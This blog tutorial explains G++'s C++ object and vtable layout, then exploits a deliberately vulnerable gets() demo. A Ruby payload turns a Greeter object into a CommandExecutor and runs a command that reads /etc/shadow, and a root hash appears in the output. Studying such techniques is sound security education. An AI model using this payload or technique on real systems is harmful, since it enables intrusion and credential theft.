May 11, 2013

Exploiting C++ VTABLES: Instance Replacement

The purpose of this post is to demonstrate an interesting way to exploit memory corruption vulnerabilities that let you overwrite an instance of a C++ class. The idea is to alter the instance so that it becomes an instance of a different class. When the code calls virtual methods on what it thinks is an instance of class A, it will really be calling virtual methods of a different class B.

First we have to learn how an instance of a C++ class is represented in memory, and what the difference between a virtual method and a non-virtual method is.

In-Memory Instance Representation

There is no standard that says how C++ classes should be represented in memory. Different compilers use different representations, but they are mostly the same. For the sake of simplicity, I'll only cover very simple types of classes: those that extend at most one class, which itself does not extend any other class. So we will not cover multiple inheritance (class A extends classes B and C) or repeated inheritance (class A extends class B, which extends class C). We will cover classes that don't extend anything, and classes that extend a single base class (class A extends class B, but class B doesn't extend anything). See C++ Under the Hood for a description of the more advanced kinds of inheritance.

For this guide I'll be using G++ on x86 (32 bit) Linux. If you're running a 64-bit system, you can produce 32-bit binaries by passing the -m32 flag to G++.

Bare Classes

Let's begin with the simplest case: a class that has no member variables and only non-virtual methods.

#include <cstdlib>
#include <cstdio>
#include <cstring>

class Foo {
    public:
        void doSomething()
        {
            printf("Hello!\n");
        }
};

int main(int argc, char **argv)
{
    Foo f;
    f.doSomething();

    // Print the object's size and its single (uninitialized) byte.
    printf("sizeof(f) = %zu, f = %d\n", sizeof(f), (int)(*(char *)&f));

    // Overwrite that byte; the object keeps working.
    *(char*)&f = 42;
    f.doSomething();

    printf("sizeof(f) = %zu, f = %d\n", sizeof(f), (int)(*(char *)&f));
}

Output:

Hello!
sizeof(f) = 1, f = -9
Hello!
sizeof(f) = 1, f = 42

This shows that an instance of Foo takes up just one byte of memory. What is that byte? It's nothing, really. There's no data associated with an instance of Foo, but it has to exist somewhere, so G++ represents it with a meaningless byte. We can even change that byte and the instance will continue to function normally.

Member Variables

Let's stick to non-virtual methods, but this time we'll add some member variables.

#include <cstdlib>
#include <cstdio>
#include <cstring>

class Foo {
    public:
        int v1;
        int v2;
        int v3;

        Foo()
        {
            v1 = 1;
            v2 = 2;
            v3 = 3;
        }

        void doSomething()
        {
            printf("Hello!\n");
        }
};

int main(int argc, char **argv)
{
    Foo f;
    f.doSomething();

    printf("sizeof(f) = %zu\n", sizeof(f));

    // View the object's memory as a plain array of ints.
    int *vars = (int *)&f;
    printf("v1 =      %d, v2 =      %d, v3 =      %d\n", f.v1, f.v2, f.v3);
    printf("vars[0] = %d, vars[1] = %d, vars[2] = %d\n",
            vars[0], vars[1], vars[2]);

    // Writing through the array changes the member variable.
    vars[0] = 1337;
    printf("v1 = %d\n", f.v1);
}

Output:

Hello!
sizeof(f) = 12
v1 =      1, v2 =      2, v3 =      3
vars[0] = 1, vars[1] = 2, vars[2] = 3
v1 = 1337

We've added three int member variables to Foo, and now an instance takes 12 bytes of memory. That makes sense, since each int variable takes 4 bytes, and 3 * 4 = 12. To convince ourselves that it really is just the variables laid out in order, we can treat it as an integer array and print the first 3 elements. We can even modify them that way.

The Foo instance is laid out in memory like this:

struct {
    int v1;
    int v2;
    int v3;
};

Virtual Methods

What's the difference between a virtual method and a non-virtual method? Without any inheritance, both are functionally equivalent. The difference appears when you add inheritance and override methods.

#include <cstdlib>
#include <cstdio>
#include <cstring>

class Foo {
    public:
        void nv()
        {
            printf("Hello from a NON-VIRTUAL method in Foo!\n");
        }

        virtual void v()
        {
            printf("Hello from a VIRTUAL method in Foo!\n");
        }
};

class FooBar : public Foo {
    public:
        void nv()
        {
            printf("Hello from a NON-VIRTUAL method in FooBar!\n");
        }

        virtual void v()
        {
            printf("Hello from a VIRTUAL method in FooBar!\n");
        }
};

int main(int argc, char **argv)
{
    FooBar foobar;
    Foo foo;

    foobar.nv();    // FooBar::nv()
    foobar.v();     // FooBar::v()

    Foo *fooptr = (Foo *)&foobar;
    fooptr->nv();   // Foo::nv()    <--- here's the difference
    fooptr->v();    // FooBar::v()

    printf("---------\n");

    // FooBar is just a pointer to the FooBar vtable.
    // Foo is just a pointer to the Foo vtable.
    printf("sizeof(foobar) = %zu, sizeof(foo) = %zu\n", sizeof(foobar), sizeof(foo));

    // Read the first word of each object: the vtable pointer.
    long *foobarAsLong = (long *)&foobar;
    long *fooAsLong = (long *)&foo;
    printf("FooBar vtable pointer: %p\n", (void *)foobarAsLong[0]);
    printf("Foo vtable pointer: %p\n", (void *)fooAsLong[0]);

    long **foobarVtable = (long **)&foobar;
    long **fooVtable = (long **)&foo;
    // This is the address of FooBar::v()
    printf("First entry of FooBar VTABLE: %p\n", (void *)foobarVtable[0][0]);
    // This is the address of Foo::v()
    printf("First entry of Foo VTABLE: %p\n", (void *)fooVtable[0][0]);

    // If FooBar had more than one virtual method, then you would access the
    // second's address with foobarVtable[0][1], the third's with
    // foobarVtable[0][2], and so on.
}

Output:

Hello from a NON-VIRTUAL method in FooBar!
Hello from a VIRTUAL method in FooBar!
Hello from a NON-VIRTUAL method in Foo!
Hello from a VIRTUAL method in FooBar!
---------
sizeof(foobar) = 4, sizeof(foo) = 4
FooBar vtable pointer: 0x8048928
Foo vtable pointer: 0x8048938
First entry of FooBar VTABLE: 0x80486ba
First entry of Foo VTABLE: 0x8048692

The difference is subtle, but important. Overriding virtual methods behaves how we would expect it to: When we treat the instance of FooBar as though it was an instance of Foo, calling a virtual method runs FooBar's implementation. When we're treating an instance of FooBar as though it was a Foo, and we call a non-virtual method, what gets executed is Foo's implementation (even though it is really a FooBar!).

When we have just a pointer to a Foo object, it could either be pointing to an instance of Foo, or to an instance of FooBar. So how does the runtime know to call FooBar's virtual method when it's really a FooBar, and Foo's virtual method when it's just a Foo? The answer is vtables.

Every class with virtual methods has a hidden member variable: a pointer to a vtable, which is basically just an array of function pointers, one element for each of the class's virtual methods. In this example, an instance of FooBar is just a pointer to FooBar's vtable, which has one element: a pointer to FooBar::v(). An instance of Foo is just a pointer to Foo's vtable, which has one element: a pointer to Foo::v().

If the classes had member variables, they would appear after the vtable pointer.

This means that when we call a virtual method, the address of the method has to be looked up in the class's vtable at runtime. The complete process is as follows:

  1. Get the address of the class's vtable from the object itself.
  2. Get the address of the virtual method from the vtable.
  3. Call the virtual method at that address.

When you add things like multiple inheritance it gets a lot more complicated than this, but now we have a good enough understanding of C++ class internals to do some fun stuff.

Instance Replacement: Turn a Greeter into a CommandExecutor

Here's some vulnerable code. It's a simple program that asks you if you're 18 or older, and if you answer yes, asks you for your name and greets you. The gets() call on line 32 creates a stack buffer overflow vulnerability.

 1 #include <cstdlib>
 2 #include <cstdio>
 3 #include <cstring>
 4 
 5 class CommandExecutor {
 6     public:
 7         virtual void execute(const char *command)
 8         {
 9             system(command);
10         }
11 };
12 
13 class Greeter {
14     public:
15         virtual void sayHello(const char *name)
16         {
17             printf("Hello, %s!\n", name);
18         }
19 };
20 
21 void greet(Greeter *greeter);
22 void doNothing();
23 
24 int main(int argc, char **argv)
25 {
26     Greeter g;
27     char buf[64];
28     printf("You must be 18 years or older to use this program. Are you? ");
29 
30     doNothing();
31 
32     gets(buf); /* OVERFLOW */
33     if (strcmp(buf, "y") == 0) {
34         greet(&g);
35         return 0;
36     } else {
37         return 1;
38     }
39 }
40 
41 void greet(Greeter *greeter)
42 {
43     char name[100];
44     printf("What is your name? ");
45     fgets(name, 100, stdin);
46     name[strlen(name)-1] = '\0';
47     greeter->sayHello(name);
48 }
49 
50 /* This exists just so that the compiler/linker needs to include
51  * CommandExecutor's code, since otherwise it would be unused. */
52 void doNothing()
53 {
54     CommandExecutor e;
55 }

The gets() call on line 32 will keep accepting data from stdin until it sees a newline. This means we can overflow 'buf', and overwrite anything on the stack that comes after buf. We could use this vulnerability to overwrite the return address and jump into some shellcode, but let's suppose there's a stack canary or something stopping us from doing so.

We can exploit this code by using the buffer overflow vulnerability to change the Greeter object into a CommandExecutor object. Both classes have no member variables, and one virtual method each, so all they are on the stack is a vtable pointer. A Greeter object is just a pointer to Greeter's vtable. A CommandExecutor object is just a pointer to CommandExecutor's vtable. Greeter's vtable contains one entry: a pointer to Greeter::sayHello(). CommandExecutor's vtable contains one entry: a pointer to CommandExecutor::execute().

To change the Greeter 'g' into a CommandExecutor, all we have to do is overwrite its vtable pointer with a pointer to CommandExecutor's vtable. Once we've done that, when greet() calls sayHello() on what it thinks is a Greeter, it will actually be calling execute() on an instance of CommandExecutor, which lets us inject shell commands.

We have to find out where CommandExecutor's vtable is. This is very easy: we just have to look at CommandExecutor's constructor.

08048736 <_ZN15CommandExecutorC1Ev>:
 8048736:       55                      push   ebp
 8048737:       89 e5                   mov    ebp,esp
 8048739:       8b 45 08                mov    eax,DWORD PTR [ebp+0x8]
 804873c:       c7 00 88 88 04 08       mov    DWORD PTR [eax],0x8048888 <--
 8048742:       5d                      pop    ebp
 8048743:       c3                      ret

There it is! 0x08048888 is the address that the constructor stores in the object's vtable pointer, so it is the value we need to write over g's vtable pointer.

Now we can construct the exploit. First we look at the disassembly of main()...

08048624 <main>:
    ...
    0x08048656 <main+50>:	mov    DWORD PTR [esp+0x4],0x8048859
    0x0804865e <main+58>:	lea    eax,[esp+0x1c] <-- buf
    0x08048662 <main+62>:	mov    DWORD PTR [esp],eax
    0x08048665 <main+65>:	call   0x8048554 <strcmp@plt>
    ...
    0x0804866e <main+74>:	lea    eax,[esp+0x5c] <-- g
    0x08048672 <main+78>:	mov    DWORD PTR [esp],eax
    0x08048675 <main+81>:	call   0x8048688 <_Z5greetP7Greeter>
    ...

...and notice 'g' starts at esp+0x5c and 'buf' starts at esp+0x1c. The difference is (esp+0x5c) - (esp+0x1c) = 0x5c - 0x1c = 64. So to exploit this, we just have to input 64 bytes (to fill 'buf') then input 0x8048888 (to overwrite g's vtable address). 'buf' has to strcmp with "y" so our input will have to start with "y\x00". The zero byte is ok, since gets() doesn't stop when it encounters a zero.

Putting it all together:

ruby -e 'print "y\x00" +        # make the age check pass
    "A"*62 +                    # fill the rest of buf
    "\x88\x88\x04\x08" +        # overwrite the vtable pointer of g with the
                                # address of the CommandExecutor vtable
    "\n" +                      # end the first input
    "head -n 1 /etc/shadow\n"   # command to run
' | ./main

Note the vtable address is encoded in little-endian format.

Output:

$ ruby -e 'print "y\x00" + "A"*62 + "\x88\x88\x04\x08" + "\n" + "head -n 1 /etc/shadow\n"' | ./main
root:$6$iZxyrn8I$SwtrvlV74y7kzc4aXRZDWLuWNHv/GcXbw09wxqzMI5xg8Swf76xGX6xZVfkKu1.eM4LwJRfmMaGnXzGXmMlCE0:15835:0:99999:7:::
You must be 18 years or older to use this program. Are you? What is your name?

What else can you do?

This is cool, but there's a lot more you can do when you have an opportunity to overwrite a vtable pointer. Some interesting ideas are:

Credit

The idea of overwriting C++ vptrs has been known for over a decade, so I didn't invent this technique by any means. As best I can tell, the idea was first presented in SMASHING C++ VPTRS by rix in Phrack 56. There's also this slide deck from the same year: Advanced Buffer Overflow Technique - Greg Hoglund (Black Hat)